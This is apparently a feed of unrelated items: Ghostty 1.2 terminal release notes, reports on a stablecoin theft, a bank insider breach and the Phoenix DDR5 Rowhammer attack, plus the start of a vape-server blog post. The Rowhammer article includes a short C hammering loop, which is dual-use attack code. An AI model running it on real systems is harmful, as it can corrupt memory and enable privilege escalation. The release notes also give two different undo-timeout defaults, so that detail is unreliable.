upgrade to Ghostty 1.2 in the near term.
All operations that close a terminal now support undo and redo using
standard macOS keybinds (
Cmd+Z
and
Cmd+Shift+Z
, which can be rebound).
This includes closing a split, closing a tab, closing a window, closing
all windows, closing other tabs, etc.
Undo/redo works by keeping recently closed terminals running but hidden
for a configurable amount of time (by default 5 seconds). During this time,
you can undo the close and the terminal will be reopened in the same location
as before. Since the terminal was always running, your exact terminal state
is restored.
The time that a terminal can be undone can be configured with the
undo-timeout
configuration.
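For example, to keep closed terminals recoverable for longer (a one-line
sketch, assuming the usual duration syntax):
undo-timeout = 30s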
In future versions of Ghostty we plan to expand the GUI interactions
that can be undone and redone, such as resizing splits, moving tabs, etc.
Ghostty on macOS now integrates with Apple Shortcuts. This enables Ghostty
to be scripted on macOS, especially when combined with non-Ghostty-specific
shortcut actions like taking screenshots, moving windows, etc.
Apple Shortcuts can be bound to global shortcuts, synced across devices,
and more. It is a really powerful tool!
This feature doesn't replace our future plans for a full cross-platform
Ghostty API. This macOS-specific feature does address many of those use cases
for macOS users, but we still plan to build alternate scripting choices in
the future.
The quick terminal is now supported on Linux while running on Wayland
with access to the
widely supported
wlr-layer-shell
protocol
.
The quick terminal has been available on macOS since Ghostty 1.0.
As a reminder, the "quick terminal" is the feature of Ghostty where a
singleton window of a terminal can be shown and hidden with a single
hotkey bound to
toggle_quick_terminal
(usually a global hotkey that
works even when Ghostty isn't focused). This is sometimes referred to
as a "dropdown terminal" or a "DOOM-style terminal."
The quick terminal on Linux fully supports tabs and splits.
The GTK application now supports global keybinds, keybinds that
work even while Ghostty is not the focused application. These keybinds
are defined with the
global:
prefix in the Ghostty configuration.
Global keybinds require a functional XDG desktop portal installed on your
system. Other parts of Ghostty already rely on XDG desktop portal, so it likely
already exists. If not, it's usually a single well-supported package away (plus
a restart).
Global keybinds support any keybind action but are particularly well
suited when paired with features such as
toggle_quick_terminal
, which is
now
also supported on GTK
.
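For example, a global binding for the quick terminal might look like this
(the key combination is illustrative):
keybind = global:ctrl+grave_accent=toggle_quick_terminal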
Preliminary support for localization of the GTK application has been added.
Currently, only GTK GUI elements are translated. Localization support for
macOS and other parts of Ghostty will arrive in future releases.
Ghostty 1.2 has complete localization for GUI elements for the following
locales:
bg_BG
ca_ES
de_DE
es_AR
es_BO
fr_FR
ga_IE
he_IL
hu_HU
id_ID
it_IT
ja_JP
ko_KR
mk_MK
nb_NO
nl_NL
pl_PL
pt_BR
ru_RU
tr_TR
uk_UA
zh_CN
Localization is done by volunteers for each locale. The Ghostty project
is extremely grateful to the volunteers who have contributed their time
to localize Ghostty. If you would like to localize Ghostty to your locale,
please see the
CONTRIBUTING.md
documentation for instructions.
The Ghostty GTK application now supports FreeBSD. This work was driven
almost completely by a single community member, who did the hard work of
submitting patches to all our dependencies to support FreeBSD, updating
our build scripts, and assisting with automated testing to ensure Ghostty
remains functional on FreeBSD.
In addition to building and running properly on FreeBSD, the community
is developing a FreeBSD port to make installation easier. We will update
the installation documentation when that port is available.
We've rewritten the entire GTK application from the ground up using the
full
GObject type system
.
Throughout the process, we tested every feature with
Valgrind
to check for memory leaks, undefined memory access, use-after-free, and more.
See the original PR for full motivations, but the result is a more stable,
modern GTK application that is much more maintainable for contributors.
The GTK application in 1.1.3 had some known memory leaks that required
Ghostty to be restarted after very extended periods of time. Many developers
never close their terminals, and no application should require periodic
restarts. The GTK application is now completely stable, and tip users
have reported no issues keeping it running for weeks at a time.
This doesn't just benefit GTK users: as a result of this work, we now
run all Ghostty unit tests under Valgrind for every commit (
#8309
).
Over 90% of our unit tests cover cross-platform code, so this helps
ensure that all of Ghostty is more stable and reliable.
Valgrind is only able to detect memory issues in executed code paths. We
exercised every possible GUI interaction, but we didn't exercise every
possible code path in Ghostty.
macOS:
The minimum required macOS version for Ghostty 1.2 remains
unchanged (macOS 13 Ventura). Ghostty is now compatible with macOS 26 (Tahoe).
GTK:
Ghostty 1.2 requires
GTK 4.14
and
libadwaita 1.5
. This
aligns with our
GTK/Adwaita version policy
.
Systems with older GTK or Adwaita versions can work around this requirement
by using an older version of Ghostty or a community-maintained snap or
flatpak package.
GTK: libadwaita is now required. We've
warned that this was coming
since the 1.1.0 release notes and our motivations are well explained in
the prior link. Please read that carefully before reacting! We put out a
call for feedback from the community and discussed this decision at length.
We shipped features addressing those concerns such as our SSD support, first
class CSS styling, and more.
GTK: The minimum required OpenGL version is now 4.3. This was required
to improve performance, fix some rendering bugs more easily, and make our
OpenGL backend more maintainable. OpenGL 4.3 was released in 2012, so this is
still over a decade old.
#7620
Bundled themes have been updated to
release-20250915-154825-b4500fc
.
Since the themes are managed upstream, this may include theme renames
and color changes.
If a theme that was working in 1.1.3 stops working
when you update to 1.2, please check the linked release to verify your theme
name.
The
dlig
font feature is now disabled by default. This may cause ligatures that
previously worked to stop working. dlig has always been formally specified
as a "discretionary ligatures" feature, meaning it should be opt-in.
The more common
calt
(contextual alternates) feature remains
on by default. You can re-enable this feature with the
font-features
config.
#8164
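If you relied on the old behavior, re-enabling discretionary ligatures is a
one-liner (a sketch using the font-features config named above):
font-features = dlig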
The list below contains deprecations that remain compatible today through
a compatibility layer, but may break in a future release if they are
ignored:
adw-toolbar-style
has been renamed to
gtk-toolbar-style
.
gtk-tabs-location=hidden
is replaced with
window-show-tab-bar=never
.
selection-invert-fg-bg
is replaced with
selection-foreground=cell-background
and
selection-background=cell-foreground
.
#5219
cursor-invert-fg-bg
is replaced with
cursor-color=cell-foreground
and
cursor-text=cell-background
.
#5219
There is no set timeline to remove these deprecations, but we recommend
adapting to the new configurations sooner rather than later to avoid
any possible disruptions in the future.
The deprecations above will continue to work without any visible warnings. We
plan to augment our GUI to show warnings about the configuration in a future
release.
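Taken together, a config migrated off all four deprecated options might look
like this (a sketch based on the replacements listed above; the toolbar-style
value is illustrative):
# adw-toolbar-style = raised      -> becomes:
gtk-toolbar-style = raised
# gtk-tabs-location = hidden      -> becomes:
window-show-tab-bar = never
# selection-invert-fg-bg = true   -> becomes:
selection-foreground = cell-background
selection-background = cell-foreground
# cursor-invert-fg-bg = true      -> becomes:
cursor-color = cell-foreground
cursor-text = cell-background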
In each section, we try to sort improvements before bug fixes.
Commands through
-e
are no longer wrapped with
/bin/sh
and instead are executed directly.
#7032
Add a new command palette feature to macOS and GTK that allows
executing most keybind actions even if they aren't bound.
#7153
#7156
Directional
goto_split
on both macOS and GTK navigates to the nearest
split in that direction from the top-left corner of the current split.
We call this "spatial navigation" and it results in more intuitive split
navigation.
#574
The
equalize_splits
keybind action now produces more expected, pleasing
results when multiple splits are oriented in the same direction.
#7710
New opt-in shell integration features
ssh-terminfo
and
ssh-env
improve the experience of using Ghostty over SSH.
#7608
Cursor information is now available to custom shaders, enabling custom
shaders to do things such as draw cool animations for cursor movement.
#7648
A new CLI command
+edit-config
will open the Ghostty configuration
in your configured terminal
$EDITOR
.
#7668
Add a new keybind
prompt_surface_title
that can be used to change
the title of a terminal manually.
#2509
#5769
Add a new keybind
scroll_to_selection
which scrolls the viewport
to the top-left of the current selection, if it exists.
#7265
Add a new keybind
set_font_size
to set the font size.
#7795
Add a new keybind
copy_title_to_clipboard
that copies the current terminal title
to the clipboard.
#7829
Add a new keybind
close_tabs:other
that closes all tabs except the
current one.
#8363
The keybinds
write_screen_file
,
write_scrollback_file
, and
write_selection_file
now support
copy
as a value to copy the file
path to the clipboard.
#7721
config
app-notifications
has a new value
config-reload
(default on)
to control whether a notification is shown when the config is reloaded.
#8366
config:
command
value can be prefixed with
shell:
or
direct:
to execute a command via the shell (default) or directly via
exec
.
#7032
config: copy on right click with
right-click-action = copy
.
#4404
config:
background-image
can be used to set a background image for
the terminal. This currently applies to each terminal, not to windows.
#3645
config:
env
can be used to specify environment variables to set
in the terminal environment.
#5257
config:
quick-terminal-size
can be used to customize the
size of the quick terminal.
#2384
config:
font-shaping-break
configures when a ligature should be
broken (split).
#4515
config: new values
cell-foreground
and
cell-background
can be used
with
selection-foreground
,
selection-background
, and
cursor-color
to set their color values to the dynamic cell colors.
#5219
config: new
bold-color
option to specify a custom color for bold to
make it easier to read.
#7168
config: new
selection-clear-on-typing
option to clear selection
when typing.
#7394
config: new
link-previews
option determines when URL previews in the
bottom of windows appear.
#7831
config: new
background-opacity-cells
applies the
background-opacity
configuration to explicit cell backgrounds (e.g. from the running program).
#7913
config: new
faint-opacity
configures the cell opacity to use for
cells marked as faint by the terminal program.
#8472
config: new
right-click-action
option can configure the behavior when
the right mouse button is clicked.
#8254
cli: pressing
enter
in
+list-themes
now shows help text on
how to configure the theme.
#4731
cli:
+list-themes
now has a flag to filter light and dark themes.
#7235
cli:
+list-colors
shows the colors in addition to their hex code.
#8393
custom shaders can now be reloaded at runtime.
#7620
custom shaders blend properly with the background color.
#7620
holding the mouse above or below the window while clicking now
scrolls the viewport without having to jiggle the mouse.
#4422
shell-integration: now uses a single
GHOSTTY_SHELL_INTEGRATION_FEATURES
env var to specify enabled features instead of multiple env vars.
#6871
shell-integration/elvish: use the
kitty-shell-cwd://
scheme for OSC 7
reporting so we don't have to encode it.
#7033
Split and tab navigation keybinds such as
goto_split
and
next_tab
support
performable
.
#7680
font: improve the performance of glyph hashing for caching, yielding
roughly a 5% speedup in synthetic stress tests.
#7677
fix crash that could happen with certain
font-family
flags provided
specifically to the CLI.
#7481
The config
adjust-cursor-thickness
now works with
cursor-style=underline
.
#7732
Resolve issue when pressing
backspace
with preedit text (such as
when using an IME).
#5728
config:
keybind=
(blank) restores default keybindings, behaving
like other
<key>=
blank values.
#5936
config:
palette
configuration now supports whitespace between
the palette number and color.
#5921
config: All configurations that take a list of colors (e.g.
macos-icon-ghost-color
) support spaces after commas.
#5918
the
copy_url_to_clipboard
keybind action works properly with OSC 8
hyperlinks.
#7499
font: fallback fonts sizes are automatically adjusted to more closely match
the primary font size visually.
#7840
font: Support new sprites: U+1CC00 to U+1CCFF, U+1CE00 to U+1CEFF, U+2500
to U+25FF, U+1FB00 to U+1FBFF.
#7755
#7761
font: U+25E4 and U+25E2 (geometric shapes) are now rasterized
with the built-in sprite font.
#3344
font: corner pieces of Geometric Shapes are now rasterized with
the built-in sprite font.
#7562
font: glyph constraint logic dramatically improved, resulting in things like
Nerd Font icons appearing more correctly.
#7809
input: for keyboards that support it, the
copy
and
paste
physical
keys now bind by default to
copy_to_clipboard
and
paste_from_clipboard
,
respectively.
#8586
input: the default
copy_to_clipboard
bindings are marked as performable,
meaning the key will be encoded to the pty if there is no text to copy.
This allows TUIs to capture the keypress instead.
#8504
input: mouse scrollwheel mapping to mouse events was modified to
better match other terminal emulators.
#6052
input:
ctrl+<ASCII>
works across a wider variety of keyboard layouts.
#7309
input: mouse dragging while clicking cancels any mouse link actions.
#7080
input: the
goto_tab
binding now binds by default to both the physical
and logical numeric keys to work with more keyboard layouts.
#8486
renderer: micro-optimization to improve cached glyph lookup performance
#8536
.
gracefully handle the case that the
exec
syscall fails when starting the
terminal command.
#7793
The "failed to launch process" error message can no longer be dismissed by
pressing a modifier key.
#7794
fix rendering issues when a rectangular selection has its top-left or
bottom-right outside of the viewport.
#7692
fix some rounding errors for octant rendering which caused octants to not
line up in some scenarios.
#7479
fix some mouse selection logic which sometimes caused Ghostty to incorrectly
select an extra line or character.
#7444
fix file path regular expression to require at least one slash.
#7355
fix a crash when reflowing a grapheme with a spacer head in a specific
location.
#7537
Images rendered using the Kitty image protocol now use correct gamma
blending.
#7368
Fix scenario where the renderer could crash when zooming out if the viewport
pointer went out of bounds.
#7899
Fix a crash that could happen if a memory page ran out of space for
hyperlinks.
#8009
Fix undefined memory access on first frame render.
#7982
Fix memory leak each time the modifier was held to search for links.
#7998
Fix crashes when our bitmap allocator had exactly 64 chunks allocated.
#8276
Fix possible use-after-free in font atlas error paths. There are no known
cases of this being exercised in the wild.
#8249
Fix possible crashes in some internal OOM conditions where growing the
backing buffer was not implemented properly.
#8277
Fix undefined memory access in OSC parser that could lead to crashes.
#8307
shell-integration/bash: no longer depends on a valid
GHOSTTY_RESOURCES_DIR
env var.
#7611
shell-integration/bash: fix a scenario where garbage characters could be
printed.
#7802
shell-integration/bash: preserve existing env more reliably.
#7908
Do not resolve symbolic links in OSC 7 path reporting.
#7773
Bundled themes updated to
release-20250915-154825-b4500fc
.
This may rename existing themes. If your theme stops working, please check
to see if the theme was renamed. The renames are done upstream so there
isn't any way for us to avoid them.
inspector: fix display of fractional pixel sizes.
#8179
contrib/vim: fix syntax highlighting of the config in scratch buffers.
#7119
This section covers the changes to terminal emulation and other capabilities
exposed to applications running inside the terminal.
Ghostty remains focused
on terminal emulator compatibility so the changes in Ghostty 1.2 only add
or improve compatibility with features in other terminal emulators. In future
versions of Ghostty, we plan to add new Ghostty-specific features that
application developers can take advantage of.
vt: parse more ConEmu OSC 9 sequences. The only ConEmu OSC 9 sequence that
Ghostty reacts to is the
9;4
progress bar sequence. The remainder are
parsed but ignored.
#8410
vt: Significant improvements in feature support and compatibility of
color operations with xterm. Specifically OSC 4, 5, 10-19, 104, 105, and
110-119. This adds new sequence support in addition to fixing compatibility
of previously supported color operations.
#8590
vt: Indicate support for OSC 52 in the primary DA report.
#7725
vt: OSC 4/104 allow multiple color specifications.
#7402
vt: Allow SGR sequences to contain up to 24 parameters, fixing some
Kakoune themes.
#8417
vt: OSC 52 can empty the current clipboard by sending an empty string.
#8018
vt:
XTGETTCAP
works properly for lowercase hex characters.
#7229
vt: Kitty image protocol supports delete by range operations.
#5957
vt: Fix aspect ratio issues with some images using the Kitty image
protocol.
#6673
vt: Kitty image protocol should accept commands with no control data.
#7023
vt: don't force Kitty images to a grid size.
#7367
vt: fix a variety of alt screen edge cases for mode 47, 1047, and 1049 to
better match xterm behavior. I don't know of any real programs that exercised
these bugs, but it's good hygiene.
#7471
vt: clear hyperlink state when switching between normal and alt screen.
#7471
vt:
ctrl+esc
now produces the proper Kitty keyboard encoding.
#7000
vt: clear correct row on index (
\n
) operation in certain edge cases.
This fixes a misrender that could happen with the vim status line
in certain scenarios.
#7093
vt: clicking on an unfocused window no longer encodes a mouse event.
#2595
vt: fix undefined memory access on certain incomplete escape sequences.
#8007
vt: OSC 9 notifications can contain single character messages.
#8396
vt: when VS15 makes a default wide character narrow, the cursor moves back
one cell.
#8538
macOS: Support macOS 26 (Tahoe).
macOS: You can now undo and redo closing any type of terminal (window, tab,
or split). We keep recently closed terminals in memory for a configurable
amount of time (default 10 seconds) so you can recover them if you close
them by accident.
#7535
macOS: Read-only accessibility API integration allows screen readers
to read Ghostty's structure and contents. This is also useful for AI software
to read Ghostty's contents. This requires accessibility permissions, so it is
opt-in.
#7601
macOS: Integration with App Intents enables Ghostty to be automated with
Apple Shortcuts.
#7634
macOS: Bell implementation. By default, the bell will bounce the dock icon
and put a bell emoji in the title. This is cleared when the terminal is
focused or on any input. The bell does not make any audio sounds. These
can all be disabled with
bell-features
.
#7099
macOS: Scripts executed from Finder or dropped onto the dock now execute
via the login shell by sending
<filepath>; exit
via stdin. This is how
the built-in Terminal and other terminals work to allow loading your
login scripts.
#7647
macOS: Custom icons are now persisted while Ghostty is not running.
#8230
macOS: Display a native GUI progress bar for
OSC 9;4
progress bar sequences.
#8477
macOS: Add
bring_all_to_front
keybind action to bring all
Ghostty windows to the front.
#4704
macOS: Add
reset_window_size
keybind action to reset the window
size to its initial configured size.
#6038
macOS: Add "Return to Default Size" menu item.
#1328
macOS:
macos-hidden
configuration will hide Ghostty from the
dock and tab menu.
#4538
macOS: Clicking links now uses the
NSWorkspace
API rather than
the
open
command. This preserves the source application (Ghostty)
which other programs can now use to change their behavior if
desired.
#5256
macOS: New config
macos-window-buttons
to hide the traffic light
buttons.
#7504
macOS: New option
padded-notch
for the existing
macos-non-native-fullscreen
configuration to put the non-native fullscreen window below the notch
but still hide the menu bar.
#5750
macOS: New keybind action and menu item
toggle_window_float_on_top
to
have a specific terminal window float above all other windows even when
unfocused.
#7237
macOS: Equalize splits now works in the quick terminal.
#7480
macOS:
quick-terminal-position=center
now supports resize while retaining
the center position.
#8398
macOS: Scripts executed from Finder or dropped onto the dock always
require manual confirmation to run.
#8442
macOS: The reset zoom button for splits is now visible with titlebar tabs
and a single tab.
#7502
macOS:
window-save-state
now saves terminal titles.
#7938
macOS:
Cmd+h
(macOS hide window) no longer sends
h
if attempting to
hide the last visible window.
#5929
macOS:
maximize
configuration now works on macOS.
#5928
macOS: Improve key input handling speed by about 10x.
#7121
macOS: Differentiate between closing a tab vs a window when pressing the
red traffic light.
#7618
macOS: Title text is vertically centered with
macos-titlebar-style=tabs
.
#5777
macOS: Ghostty launched via the CLI now comes to the front.
#8546
macOS: focus no longer goes to the first split when toggling
non-native fullscreen.
#6999
macOS: Fix crash that would occur if non-native fullscreen and
fullscreen = true
were both set.
#7277
macOS: If
title
is set, the title is set on the window on load,
allowing window managers to see the title sooner.
#6056
macOS: Any keypress with
cmd
pressed is not encoded for legacy
key encoding.
#6057
macOS: Invoking
new_tab
in any way within the quick terminal now
shows a helpful error rather than creating a new window. Tabs in the
quick terminal will be supported in a future release.
#5939
macOS: Closing non-native fullscreen windows now properly restores
the menu bar.
#7525
macOS: Dismiss any notifications on window focus.
#7531
macOS: Dismiss any notifications on window close.
#7531
macOS: Dismiss any notifications of an already-focused window after
a few seconds.
#7531
font/coretext: improve font search sorting to be more consistent.
#7483
man pages now mention macOS-specific configuration path.
#5938
GTK: Support for FreeBSD. This work was all driven by a single community
member and we are very grateful for their contributions.
#7606
GTK: New icon that matches a wider variety of desktop environments
stylistically. This is never going to be perfect due to the diversity of
the Linux/BSD ecosystems, but the new icon is a big improvement and makes
the app feel less macOS-centric.
#8038
GTK: Configuration can be reloaded by sending
SIGUSR2
to Ghostty.
#7759
GTK: A new
gtk-titlebar-style=tabs
puts the tabs into the titlebar
of windows.
#8166
GTK: The quick terminal now works on Linux under Wayland and the
wlr-layer-shell
protocol.
#4624
GTK:
global:
keybinds now work whenever XDG desktop portal
is available (almost all desktop environments).
#6051
GTK: Display a native GUI progress bar for
OSC 9;4
progress bar sequences,
such as those emitted by systemd.
#7975
GTK: Audio bell support (default off) can be enabled with
bell-features=audio
and setting
bell-audio-path
and
bell-audio-volume
.
#5326
GTK: Install DBus and Systemd activation services for faster startup.
#7433
GTK: OpenGL renderer now supports linear blending for more correct
color blending.
#7620
GTK: Register the
X-KDE-Shortcut
key so that a shortcut can be registered
on KDE to open Ghostty.
#7673
GTK: Dynamically choose between
io_uring
and
epoll
for the
async API on Linux. Previously, this was hardcoded to
io_uring
and epoll-only systems had to build from source.
#5916
GTK: New config
async-backend
can be set to
epoll
to force using
epoll instead of io_uring on Linux. This can be useful on kernels where
iowait reporting is broken.
#5916
GTK: New config
window-show-tab-bar
customizes when the tab bar
is visible.
#5590
GTK: New config
quick-terminal-keyboard-interactivity
to specifically
customize the keyboard interactivity setting on Wayland.
#7477
GTK: New keybind action
show_gtk_inspector
to show the GTK inspector
since terminal keybinds usually clobber the GTK default.
#7468
GTK: The new tab button now has a dropdown menu to create new splits.
#7127
GTK: A new "remember choice" toggle is added to the clipboard confirmation
dialog.
#6783
GTK: A new native GUI element is used to show when a command exits
improperly or while
wait-after-command
is set.
#7836
GTK: If
title
is set, windows are initialized with the title immediately,
rather than after the surface is initialized. This lets window managers
read and use this value.
#8535
GTK: Show a native GUI element if the OpenGL renderer fails to initialize
rather than a blank window.
#8390
GTK: Escape
(
and
)
when dropping filepaths onto the terminal.
#6922
GTK:
copy-on-select=clipboard
no longer causes toast spam while
selecting. The copy only happens when the mouse is released.
#4800
GTK: All split directions are now available in the menubar and
context menus.
#5779
GTK: Windows do not request close confirmation for
wait-after-command
.
#7500
GTK: When server-side decorations are used, remove the
solid-csd
CSS class from windows that resulted in a visible border.
#8127
GTK: Fix an issue where the window would sometimes become blank
and not close after the last tab was closed.
#5837
GTK: Resize overlay now uses language-neutral
w x h
format
and omits units.
#6013
GTK: Clean up surface cgroup properly on close.
#6766
GTK: Reduce flickering/stretching on resize for OpenGL.
#7155
GTK: Detect
GHOSTTY_RESOURCES_DIR
in more installation environments.
#6814
GTK: Fix cases where
xdg-open
calls would leave defunct processes.
#7657
GTK/X11: Fix blur regions when using > 200% scaling.
#6978
font/freetype: true bitmap fonts are now supported.
#8512
font/freetype: fix possible crashes when using a font with no SFNT tables.
#8483
font/freetype: error when loading SVG glyphs, since we don't support them
anyways.
#6824
font/freetype: fix data races that could cause crashes in rare scenarios.
#7238
font/freetype: convert more non-UTF-8 encodings of font names to UTF-8.
#8204
packaging: experimental snap packaging is now tested in CI. The
published snap image is maintained by an external maintainer for now.
#3931
We now generate source tarballs with some preprocessed files as is
standard with many source tarballs (e.g. converting parser
.y
to
.c
).
For Ghostty, we preprocess Blueprint
ui
to
xml
files, translations,
and GTK resource files. This allows Ghostty to be built on older platforms
without access to newer build tools.
Packagers should use the source
tarball, not the Git checkout. The
PACKAGING.md
documentation has been
updated with this information.
#6800
The GLFW apprt has been deleted. This was never a supported apprt and
was only used for development and testing. We warned against packaging GLFW
in our
PACKAGING.md
documentation. This is now gone because we don't need
it for development or testing anymore.
#7815
The "tip" releases do not overwrite previously released tips with the
same commit. This ensures that checksums remain stable once a release
is cut. For packagers that provide tip packages, this should improve
security and compatibility with tooling. Tip releases have always been
signed.
#8549
Ghostty 1.2 now comes with a configuration to build for Flatpak as well as
Snap. We test this for every commit in CI and strive to keep Ghostty
working via these distribution methods. However, we do not officially
provide or maintain Flatpak or Snap packages, yet.
This is major progress: Ghostty 1.1.x didn't work at all as a Flatpak
or Snap package without patches, and the official project made no guarantees
about maintaining these packages. Now, we at least build and test on these
platforms, while still falling short of official distribution.
Our major blockers for official distribution are
maintainer interest
and release automation. None of the current Ghostty maintainers maintain the
Snap or Flatpak builds of Ghostty, and we don't feel confident in our
ability to maintain these packages long term. If you are interested in
helping maintain the Flatpak or Snap packages of Ghostty, please join
Discord and message us in
#packaging
.
Ghostty 1.3 will continue the focus of making Ghostty the
"best existing terminal emulator"
by shipping the last remaining major missing features to achieve
parity with other popular terminal emulators. Namely, we plan on shipping
scrollback search and scrollbars for 1.3, at a minimum.
2
The primary focus of Ghostty 1.3 will be on desktop application features
(of which scrollback search and scrollbars are a part). The core terminal
emulation features of Ghostty have already proven to be very feature
rich and stable. However, we plan on continuing to expand our VT feature
support, such as adopting new experimental protocols that have been recently
released into the ecosystem by others.
To answer common requests,
Windows
and
libghostty as a
standalone library
are not planned for Ghostty 1.3. These remain part
of the long term roadmap, but we want to focus on our existing platforms
and desktop applications first.
Ghostty will move to a 6-month release cycle for major/minor releases,
with the next minor release (1.3.0) planned for March 2026. A March/September
release cycle aligns well with many major Linux distributions and macOS.
Patch releases (e.g. 1.2.1) will be made as needed on an unscheduled basis.
This is a relatively long release cycle for modern applications, but
lets the development team focus on large, impactful features with enough
time to stabilize in tip releases. For packagers, it avoids the churn of
packaging new releases frequently. And the alignment with major OS releases
lets us ensure we ship major releases that work well on new OS versions.
For users who are interested in more frequent updates, we recommend using
the
tip
release channel
on macOS or
building from source
frequently on Linux.
We have thousands of nightly users (thank you for testing!) and the entire
maintainer team works hard to keep tip releases stable. For the entire 1.1
to 1.2 development cycle, I can't remember tip releases ever being broken
for daily use.
I didn't do a full survey of this, but I couldn't find any other
terminal emulator that supported all of OSC 9 notifications, OSC 777 notifications,
and
OSC
9;4
progress bars.
↩
"Parity" here is used loosely to describe the most popular, frequently
used features of other terminal emulators. There is a long tail of features
we'll likely never fully implement (and vice versa for our features).
↩
Yala stablecoin depegs after theft
Web3 Is Going Great
web3isgoinggreat.com
2025-09-15 19:19:50
The YU bitcoin-backed stablecoin lost its intended dollar peg after what they described as "an attempted attack", later writing that there was an "unauthorized transfer of funds". Although they initially wrote that "All funds are safe", they later stated that they "identified the stolen ass...
The YU bitcoin-backed
stablecoin
lost its intended dollar
peg
after what they described as "an attempted attack", later writing that there was an "unauthorized transfer of funds". Although they initially wrote that "All funds are safe", they later stated that they "identified the stolen assets on-chain and are actively working with law enforcement to pursue recovery." Research firm Lookonchain observed a large mint of the YU token that may have been related — if so, the attacker successfully stole at least 1,501 ETH ($6.75 million), and holds a substantial quantity of YU they still haven't sold.
Despite the project's attempted reassurances, the YU stablecoin lost its $1 peg, plummeting as low as around $0.20. As of writing, about a day later, the stablecoin is still well below its peg, at around $0.94.
FinWise insider breach impacts 689K American First Finance customers
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 19:18:10
FinWise Bank is warning on behalf of corporate customers that it suffered a data breach after a former employee accessed sensitive files after the end of their employment. [...]...
FinWise Bank is warning on behalf of corporate customers that it suffered a data breach after a former employee accessed sensitive files after the end of their employment.
"On May 31, 2024, FinWise experienced a data security incident involving a former employee who accessed FinWise data after the end of their employment," reads a data breach notification sent by FinWise on behalf of American First Finance (AFF).
American First Finance (AFF) is a company that offers consumer financing products, including installment loans and lease-to-own programs, for a diverse range of products and services. Customers use AFF to apply for and manage the loans, with the company handling the services, account setup, repayment process, and customer support.
FinWise partners with American First Finance by serving as the bank that originates and funds these loans.
According to a filing with the
Maine Attorney General's office
, American First Finance disclosed that the FinWise Bank data breach impacted the data of 689,000 of its customers. The filing included a notification letter prepared by FinWise on behalf of American First Finance, confirming that the bank itself was the source of the incident.
FinWise said that files containing customer information, including full names and other personal data elements, were accessed during the breach, but redacted the complete list of exposed data in the breach notification.
The company did not disclose how the ex-employee was able to access this data after they were no longer employed or the total number of people impacted by the FinWise breach.
Upon discovery, the bank launched an investigation with outside cybersecurity professionals to assess the scope of the exposure.
FinWise says it has strengthened internal controls to reduce the risk of similar incidents and is offering 12 months of free credit monitoring and identity theft protection services to those impacted.
BleepingComputer contacted FinWise Bank to learn more about the breach, but a FinWise spokesperson said they do not comment on ongoing litigation.
However, the company shared a link to a recent quarterly SEC filing (
June 30, 2025 Form 10-Q
), in which the company notes that approximately 600,000 people were impacted, a number similar to the one cited by American First Finance.
The company is now facing multiple class-action lawsuits related to the data breach.
New Phoenix attack bypasses Rowhammer defenses in DDR5 memory
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 19:01:24
Academic researchers have devised a new variant of Rowhammer attacks that bypass the latest protection mechanisms on DDR5 memory chips from SK Hynix. [...]...
Academic researchers have devised a new variant of Rowhammer attacks that bypass the latest protection mechanisms on DDR5 memory chips from SK Hynix.
A Rowhammer attack works by repeatedly accessing specific rows of memory cells with high-speed read/write operations to cause enough electrical interference to alter the value of nearby bits from one to zero and vice-versa (bit flipping).
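The core of a classic Rowhammer loop is tiny. A sketch of the textbook two-row variant on x86 (the addresses, iteration count, and row mapping are all illustrative; real attacks such as Phoenix add refresh synchronization on top of this):
#include <emmintrin.h> /* _mm_clflush */

/* Repeatedly read two aggressor addresses that map to different rows of
   the same DRAM bank. Flushing the cache lines forces every read to go
   all the way to DRAM, stressing the victim rows in between. */
void hammer(volatile char *row_a, volatile char *row_b, long iterations) {
    for (long i = 0; i < iterations; i++) {
        (void)*row_a;
        (void)*row_b;
        _mm_clflush((const void *)row_a);
        _mm_clflush((const void *)row_b);
    }
}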
An attacker could potentially corrupt data, increase their privileges on the system, execute malicious code, or gain access to sensitive data.
One defense mechanism against Rowhammer attacks is called Target Row Refresh (TRR), which prevents bit flips by issuing an extra refresh command when detecting frequent accesses to a particular row.
Hammering DDR5 for privilege escalation
A team of researchers in the Computer Security Group (COMSEC) at ETH Zurich University in Switzerland and Google created a new DDR5 Rowhammer attack they call Phoenix, which can flip bits in memory chips to enable malicious activity.
The tests were carried out on DDR5 products from Hynix, one of the largest memory chip makers with an estimated 36% of the market, but the security risk may extend to products from other vendors as well.
After reverse-engineering the complex protections that Hynix implemented against Rowhammer and learning how they worked, the researchers discovered that certain refresh intervals were not sampled by the mitigation, which could be exploited.
They also developed a method for Phoenix to track and synchronize with thousands of refresh operations by self-correcting when it detects a missed one.
To evade TRR protections, the Rowhammer patterns in the Phoenix attack cover 128 and 2608 refresh intervals and hammer specific activation slots only at precise moments.
Using their model, the researchers were able to flip bits on all 15 DDR5 memory chips in the test pool and created the first Rowhammer privilege escalation exploit.
During tests, it took them less than two minutes to get a shell with root privileges “on a commodity DDR5 system with default settings.”
Additionally, the researchers explored the possibility of practical exploitation using the Phoenix attack method to take control of a target system.
When targeting page-table entries (PTEs) to craft an arbitrary memory read/write primitive, they found that all products in the test are vulnerable.
In another test, they targeted RSA-2048 keys of a co-located VM to break SSH authentication and discovered that 73% of the DIMMs are exposed.
In a third evaluation, the researchers found that they could alter the sudo binary to increase their local privileges to root level on 33% of the tested chips.
All tested DDR5 modules are vulnerable to the new Phoenix Rowhammer attack
source: COMSEC ETH Zurich
The table above shows that all memory chips tested are vulnerable to one of the Rowhammer patterns used in the Phoenix attack. The shorter one with 128 refresh intervals is more effective, though, generating more bit flips on average.
Phoenix is currently tracked as CVE-2025-6202 and received a high-severity score. It affects SK Hynix DDR5 DIMM modules produced between January 2021 and December 2024.
Although Rowhammer is an industry-wide security problem that cannot be corrected for existing memory modules, users can stop Phoenix attacks by tripling the DRAM refresh interval (tREFI).
However, this kind of stress may cause errors or data corruption and render the system unstable.
The researchers also shared a
repository
with resources to reproduce the Phoenix attack, which includes experiments based on Field-Programmable Gate Array (FPGA) to reverse-engineer TRR implementations, and the code for the proof-of-concept exploits.
This article is
NOT
served from a web server running on a disposable vape. If you want to see the real deal, click
here
. The content is otherwise identical.
For a couple of years now, I have been collecting disposable vapes from friends and family. Initially, I only salvaged the batteries for “future” projects (It’s not hoarding, I promise), but recently, disposable vapes have gotten more advanced. I wouldn’t want to be the lawyer who one day will have to argue how a device with USB C and a rechargeable battery can be classified as “disposable”. Thankfully, I don’t plan on pursuing law anytime soon.
